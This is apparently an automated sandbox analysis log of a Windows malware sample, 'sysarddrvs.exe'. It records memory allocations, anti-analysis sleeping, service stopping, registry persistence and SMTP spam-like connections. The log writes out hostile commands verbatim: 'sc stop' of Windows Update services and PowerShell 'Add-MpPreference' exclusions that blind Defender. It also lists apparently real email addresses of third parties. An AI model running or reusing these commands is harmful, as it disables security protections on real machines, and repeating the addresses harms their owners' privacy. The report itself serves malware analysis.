heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0242b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02435000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02493000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02494000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02495000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02496000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02497000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02498000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02499000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04ae9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04aea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04aeb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04aec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04aed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04aee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04aef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04af4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description sysarddrvs.exe tried to sleep 209 seconds, actually delayed analysis time by 209 seconds
domain icanhazip.com
file C:\Users\test22\AppData\Local\Temp\158876794.exe
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000003e0
filepath: C:\Users\test22\tbtnds.dat
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\tbtnds.dat
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmdline "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmdline cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
file C:\Users\test22\AppData\Local\Temp\158876794.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline sc stop UsoSvc
cmdline sc stop DoSvc
cmdline sc stop WaaSMedicSvc
cmdline "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmdline sc stop BITS
cmdline sc stop wuauserv
receiver [] sender [] server 67.195.228.111
receiver [] sender [] server 35.162.106.154
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 35.162.106.154
receiver [] sender [] server 96.102.18.147
receiver [] sender [] server 35.162.106.154
receiver [] sender [] server 65.20.63.100
receiver [] sender [] server 65.20.63.100
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 74.208.5.22
receiver [] sender [] server 74.208.5.22
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [u'gris.mora@sbcglobal.net'] server 144.160.159.21
receiver [] sender [u'joelcisneros@sbcglobal.net'] server 144.160.159.21
receiver [] sender [] server 96.102.157.181
receiver [] sender [u'kathleenteall@att.net'] server 144.160.235.143
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [u'par1202@att.net'] server 144.160.235.143
receiver [] sender [u'bridget.harper@sbcglobal.net'] server 144.160.159.21
receiver [] sender [] server 84.116.6.18
receiver [] sender [] server 74.208.5.22
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 84.116.6.18
receiver [] sender [u'lordsonny@sbcglobal.net'] server 144.160.159.21
receiver [] sender [u'briggan@att.net'] server 144.160.235.143
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 65.20.63.100
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [u'shan_white@sbcglobal.net'] server 144.160.159.21
receiver [] sender [] server 96.102.157.181
receiver [] sender [u'eatatum@att.net'] server 144.160.235.143
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 96.102.157.181
receiver [] sender [u'eandjkirkland@att.net'] server 144.160.235.143
receiver [u'gmbeck1@verizon.net'] sender [u'gmbeck1@verizon.net'] server 98.136.96.93
receiver [] sender [] server 96.102.157.181
receiver [u'mguers4@verizon.net'] sender [u'mguers4@verizon.net'] server 98.136.96.93
receiver [] sender [] server 35.162.106.154
receiver [u'awwitskittenx@aim.com'] sender [u'awwitskittenx@aim.com'] server 98.136.96.93
receiver [] sender [] server 96.102.157.181
receiver [u'bluesniper911@aim.com'] sender [u'bluesniper911@aim.com'] server 98.136.96.93
receiver [] sender [] server 96.102.157.181
receiver [] sender [] server 84.116.6.18
host 109.74.35.21
host 109.74.43.21
host 151.241.237.185
host 185.215.113.66
host 194.93.26.210
host 195.158.22.13
host 2.185.163.114
host 213.230.90.222
host 217.30.160.154
host 5.238.186.28
host 77.221.27.219
host 77.91.77.92
host 78.85.106.173
host 83.239.55.170
host 86.62.3.154
host 95.58.72.245
host 95.59.4.234
Time & API Arguments Status Return Repeated

ControlService

 service_handle: 0x0065b8a0
service_name: wuauserv
control_code: 1
0 0

ControlService

 service_handle: 0x0048b850
service_name: BITS
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings reg_value C:\Windows\sysarddrvs.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
file C:\Users\test22\AppData\Local\Temp\newtpp.exe:Zone.Identifier
file C:\Users\test22\AppData\Local\Temp\158876794.exe:Zone.Identifier
file C:\Windows\sysarddrvs.exe:Zone.Identifier
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
description attempts to disable windows update notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
service wuauserv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start)
service BITS (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start)
dead_host 95.59.4.234:40500
dead_host 35.162.106.154:25
dead_host 47.43.18.9:25
dead_host 77.91.77.92:80
dead_host 151.241.237.185:40500
dead_host 64.136.44.37:25
dead_host 96.102.157.180:25
dead_host 84.116.6.18:25
dead_host 192.168.56.103:50204
dead_host 192.168.56.103:50121
dead_host 65.20.63.100:25
dead_host 96.103.145.163:25
dead_host 83.239.55.170:40500
dead_host 74.208.5.22:25
dead_host 86.62.3.154:40500
dead_host 96.102.18.147:25
dead_host 64.136.52.37:25
dead_host 96.102.157.181:25